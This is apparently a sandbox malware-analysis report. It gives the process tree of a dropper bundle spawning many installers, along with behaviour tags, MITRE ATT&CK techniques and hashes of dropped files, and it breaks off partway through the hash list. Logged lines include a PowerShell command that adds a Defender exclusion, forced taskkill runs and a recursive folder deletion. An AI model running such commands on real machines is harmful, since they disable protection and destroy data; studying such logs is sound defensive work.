C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10fcc13ae0125c8.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10720d229511df563.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1018ef4aa251c026c.exe4⤵
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv pVzHgpXms02TJxnTGiup5w.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri10720d229511df563.exeFri10720d229511df563.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri1018ef4aa251c026c.exeFri1018ef4aa251c026c.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri10fcc13ae0125c8.exeFri10fcc13ae0125c8.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-IV5JV.tmp\Fri10fcc13ae0125c8.tmp"C:\Users\Admin\AppData\Local\Temp\is-IV5JV.tmp\Fri10fcc13ae0125c8.tmp" /SL5="$201AA,239846,156160,C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri10fcc13ae0125c8.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-VE8VD.tmp\Sayma.exe"C:\Users\Admin\AppData\Local\Temp\is-VE8VD.tmp\Sayma.exe" /S /UID=burnerch23⤵
-
C:\Program Files\Windows Photo Viewer\PBSWAUEFXI\ultramediaburner.exe"C:\Program Files\Windows Photo Viewer\PBSWAUEFXI\ultramediaburner.exe" /VERYSILENT4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-2F6C2.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-2F6C2.tmp\ultramediaburner.tmp" /SL5="$50366,281924,62464,C:\Program Files\Windows Photo Viewer\PBSWAUEFXI\ultramediaburner.exe" /VERYSILENT5⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu6⤵
-
C:\Users\Admin\AppData\Local\Temp\9d-5545f-768-640ad-a5e7b04eff9e3\Mefylawalo.exe"C:\Users\Admin\AppData\Local\Temp\9d-5545f-768-640ad-a5e7b04eff9e3\Mefylawalo.exe"4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e65⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc98aa46f8,0x7ffc98aa4708,0x7ffc98aa47186⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc98aa46f8,0x7ffc98aa4708,0x7ffc98aa47186⤵
-
C:\Users\Admin\AppData\Local\Temp\73-dbb7f-a53-c3d8e-280805606b41c\Sakenicalae.exe"C:\Users\Admin\AppData\Local\Temp\73-dbb7f-a53-c3d8e-280805606b41c\Sakenicalae.exe"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ycna3tef.r2h\GcleanerEU.exe /eufive & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\ycna3tef.r2h\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\ycna3tef.r2h\GcleanerEU.exe /eufive6⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8276 -s 2407⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cfelq2xo.uh0\installer.exe /qn CAMPAIGN="654" & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\cfelq2xo.uh0\installer.exeC:\Users\Admin\AppData\Local\Temp\cfelq2xo.uh0\installer.exe /qn CAMPAIGN="654"6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o4551stw.lmt\any.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\o4551stw.lmt\any.exeC:\Users\Admin\AppData\Local\Temp\o4551stw.lmt\any.exe6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jewjaev1.idy\gcleaner.exe /mixfive & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\jewjaev1.idy\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\jewjaev1.idy\gcleaner.exe /mixfive6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1988 -s 2407⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fhonty25.130\autosubplayer.exe /S & exit5⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5324 -s 4523⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5324 -ip 53241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4628 -ip 46281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4560 -ip 45601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5204 -ip 52041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1172 -ip 11721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4836 -ip 48361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4992 -ip 49921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6096 -ip 60961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5020 -ip 50201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 2480 -ip 24801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5972 -ip 59721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5436 -ip 54361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 7632 -ip 76321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5700 -ip 57001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5700 -ip 57001⤵
-
C:\Users\Admin\AppData\Local\Temp\134A.exeC:\Users\Admin\AppData\Local\Temp\134A.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\134A.exeC:\Users\Admin\AppData\Local\Temp\134A.exe2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\3124.exeC:\Users\Admin\AppData\Local\Temp\3124.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\3124.exeC:\Users\Admin\AppData\Local\Temp\3124.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\3124.exeC:\Users\Admin\AppData\Local\Temp\3124.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\NetFrame.exe"C:\Users\Admin\AppData\Local\Temp\NetFrame.exe"3⤵
- Drops startup file
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\ProgramData4⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /K taskkill /IM Database.exe /F && exit4⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Windows\system32\taskkill.exetaskkill /IM Database.exe /F5⤵
- Kills process with taskkill
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit4⤵
-
C:\ProgramData\Systemd\note3dll.exeNULL4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5700 -ip 57001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4560 -ip 45601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 7676 -ip 76761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 7332 -ip 73321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2192 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5700 -ip 57001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3848 -ip 38481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2192 -ip 21921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\8CD2.exeC:\Users\Admin\AppData\Local\Temp\8CD2.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8692 -s 2442⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5700 -ip 57001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\B1DF.exeC:\Users\Admin\AppData\Local\Temp\B1DF.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5700 -ip 57001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\F561.exeC:\Users\Admin\AppData\Local\Temp\F561.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 8692 -ip 86921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\39DE.exeC:\Users\Admin\AppData\Local\Temp\39DE.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\5C99.exeC:\Users\Admin\AppData\Local\Temp\5C99.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 14468 -s 2402⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\79F6.exeC:\Users\Admin\AppData\Local\Temp\79F6.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13912 -s 2402⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\A4A1.exeC:\Users\Admin\AppData\Local\Temp\A4A1.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\123441egwegweg.exe"C:\Users\Admin\AppData\Local\Temp\123441egwegweg.exe"3⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4416 -s 9444⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7868 -s 4483⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 7868 -ip 78681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C55ED02B90EEE5A80F736BF1A48B375B C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 981FC81714771E73245AA90A919DEC4B2⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 98AA4772553E835064403B12767F8CFC E Global\MSI00002⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\C52A.exeC:\Users\Admin\AppData\Local\Temp\C52A.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4796 -s 2402⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 8276 -ip 82761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10160 -s 4482⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 10160 -ip 101601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 14468 -ip 144681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 14748 -ip 147481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 13912 -ip 139121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 8168 -ip 81681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 1988 -ip 19881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 4796 -ip 47961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 524 -p 4416 -ip 44161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
3Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Modify Registry
4Disabling Security Tools
1Virtualization/Sandbox Evasion
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri1008c7d6874.exeMD5
7b3895d03448f659e2934a8f9b0a52ae
SHA1084dc9cd061c5fb90bfc17a935d9b6ca8947a33c
SHA256898149d20045702c1bf0c4e552a907c763912d4e5d9cf5b348e1aae80928b097
SHA512dcc1a140f364d7428fcf3ca85613a911524eb7872ef9076c89a8252fa16cefcdd3fe6d355c857585f8cea8f3e00a43f7ea088c296ecdb3012179db148cc6b25d
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri1008c7d6874.exeMD5
7b3895d03448f659e2934a8f9b0a52ae
SHA1084dc9cd061c5fb90bfc17a935d9b6ca8947a33c
SHA256898149d20045702c1bf0c4e552a907c763912d4e5d9cf5b348e1aae80928b097
SHA512dcc1a140f364d7428fcf3ca85613a911524eb7872ef9076c89a8252fa16cefcdd3fe6d355c857585f8cea8f3e00a43f7ea088c296ecdb3012179db148cc6b25d
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri1015b9a4e0b.exeMD5
1b30ac88a74e6eff68433de176b3a5c3
SHA131039df81b419ae7f777672785c7bcf9e7004d04
SHA2560fd88e63305a7a711efc11534ab1b681d7ad419c2832a2ac9f79a9860d520e28
SHA512c6fb8368cfba84ce3c09c30345b05fce8f30bc59536fecd4b9226bbd2d0bde5910f162b8c68985f99ba10bc9564503a26712b9af8937ef03634a3f5bd3c0f730
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri1015b9a4e0b.exeMD5
1b30ac88a74e6eff68433de176b3a5c3
SHA131039df81b419ae7f777672785c7bcf9e7004d04
SHA2560fd88e63305a7a711efc11534ab1b681d7ad419c2832a2ac9f79a9860d520e28
SHA512c6fb8368cfba84ce3c09c30345b05fce8f30bc59536fecd4b9226bbd2d0bde5910f162b8c68985f99ba10bc9564503a26712b9af8937ef03634a3f5bd3c0f730
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri1018ef4aa251c026c.exeMD5
b7f786e9b13e11ca4f861db44e9fdc68
SHA1bcc51246a662c22a7379be4d8388c2b08c3a3248
SHA256f8987faadabfe4fd9c473ac277a33b28030a7c2a3ea20effc8b27ae8df32ddf6
SHA51253185e79e9027e87d521aef18488b57b900d3415ee132c3c058ed49c5918dd53a6259463c976928e463ccc1e058d1c9c07e86367538c6bed612ede00c6c0f1a5
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri1018ef4aa251c026c.exeMD5
b7f786e9b13e11ca4f861db44e9fdc68
SHA1bcc51246a662c22a7379be4d8388c2b08c3a3248
SHA256f8987faadabfe4fd9c473ac277a33b28030a7c2a3ea20effc8b27ae8df32ddf6
SHA51253185e79e9027e87d521aef18488b57b900d3415ee132c3c058ed49c5918dd53a6259463c976928e463ccc1e058d1c9c07e86367538c6bed612ede00c6c0f1a5
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri1034cd265b5e0adcd.exeMD5
b4dd1caa1c9892b5710b653eb1098938
SHA1229e1b7492a6ec38d240927e5b3080dd1efadf4b
SHA2566a617cd85f6e4fa3861d97d1f8197e909f6ca895a1c6139171d26068656a4c95
SHA5126285d20d85c2ca38c8dbb92bc8985371cddc9dbe042128e0cc6a48b24e52e5990a196b424a59aa84e551b67c91f5f58894dca2b9c5b130ea78076768e15ecae8
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri1034cd265b5e0adcd.exeMD5
b4dd1caa1c9892b5710b653eb1098938
SHA1229e1b7492a6ec38d240927e5b3080dd1efadf4b
SHA2566a617cd85f6e4fa3861d97d1f8197e909f6ca895a1c6139171d26068656a4c95
SHA5126285d20d85c2ca38c8dbb92bc8985371cddc9dbe042128e0cc6a48b24e52e5990a196b424a59aa84e551b67c91f5f58894dca2b9c5b130ea78076768e15ecae8
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri103a7805577.exeMD5
cf4029ca825cdfb5aaf5e9bb77ebb919
SHA1eb9a4185ddf39c48c6731bf7fedcba4592c67994
SHA256c5761c7d94d975a44e08caf948531b363c30e3f78d7b45a7b28bda39beb4e534
SHA512d3e31b35c49f1608dfe5ee97e96a26e4548e49325bd04408e5b15efb5f8f3a39f5abe58e9ec0ad7bf20cb13d967eec2f11634332a0a79d525521bbd9c0b5c6d1
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri103a7805577.exeMD5
cf4029ca825cdfb5aaf5e9bb77ebb919
SHA1eb9a4185ddf39c48c6731bf7fedcba4592c67994
SHA256c5761c7d94d975a44e08caf948531b363c30e3f78d7b45a7b28bda39beb4e534
SHA512d3e31b35c49f1608dfe5ee97e96a26e4548e49325bd04408e5b15efb5f8f3a39f5abe58e9ec0ad7bf20cb13d967eec2f11634332a0a79d525521bbd9c0b5c6d1
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri105268dda3.exeMD5
5ce20e8fc69de75848f34beb5522a676
SHA19552dcc7ef39e2174ab18b856c4c145bfac0c6c3
SHA25607fd0812403fa09004fd4d595fdd8b680fb5707644b140909fd2e0bf54d6ea56
SHA512835c302805cb4f68b0a77c274cdbcab7910635679e183d84065fa35569d7db60dc8989b2f3564949d3213e2425481d9242be35691e9b45ccd96274ec481f76ea
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri105268dda3.exeMD5
5ce20e8fc69de75848f34beb5522a676
SHA19552dcc7ef39e2174ab18b856c4c145bfac0c6c3
SHA25607fd0812403fa09004fd4d595fdd8b680fb5707644b140909fd2e0bf54d6ea56
SHA512835c302805cb4f68b0a77c274cdbcab7910635679e183d84065fa35569d7db60dc8989b2f3564949d3213e2425481d9242be35691e9b45ccd96274ec481f76ea
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri10584c049c7f.exeMD5
118cf2a718ebcf02996fa9ec92966386
SHA1f0214ecdcb536fe5cce74f405a698c1f8b2f2325
SHA2567047db11a44cfcd1965dcf6ac77d650f5bb9c4282bf9642614634b09f3dd003d
SHA512fe5355b6177f81149013c444c244e540d04fbb2bcd2bf3bb3ea9e8c8152c662d667a968a35b24d1310decb1a2db9ac28157cda85e2ef69efee1c9152b0f39089
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri10584c049c7f.exeMD5
118cf2a718ebcf02996fa9ec92966386
SHA1f0214ecdcb536fe5cce74f405a698c1f8b2f2325
SHA2567047db11a44cfcd1965dcf6ac77d650f5bb9c4282bf9642614634b09f3dd003d
SHA512fe5355b6177f81149013c444c244e540d04fbb2bcd2bf3bb3ea9e8c8152c662d667a968a35b24d1310decb1a2db9ac28157cda85e2ef69efee1c9152b0f39089
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri106e757f6d75.exeMD5
09aafd22d1ba00e6592f5c7ea87d403c
SHA1b4208466b9391b587533fe7973400f6be66422f3
SHA256da137a976b0690462ffbe4d94bf04f4e9d972b62d3672bc3b6e69efb9dc004d4
SHA512455189206c764b73f1753f8221a01c6a1f25d530dd5629f503cec1d519a1117666ecf593ba0896e7b72c74681857ce3a5245e35c799be81012532157d0ac74fd
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri106e757f6d75.exeMD5
09aafd22d1ba00e6592f5c7ea87d403c
SHA1b4208466b9391b587533fe7973400f6be66422f3
SHA256da137a976b0690462ffbe4d94bf04f4e9d972b62d3672bc3b6e69efb9dc004d4
SHA512455189206c764b73f1753f8221a01c6a1f25d530dd5629f503cec1d519a1117666ecf593ba0896e7b72c74681857ce3a5245e35c799be81012532157d0ac74fd
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri106e757f6d75.exeMD5
09aafd22d1ba00e6592f5c7ea87d403c
SHA1b4208466b9391b587533fe7973400f6be66422f3
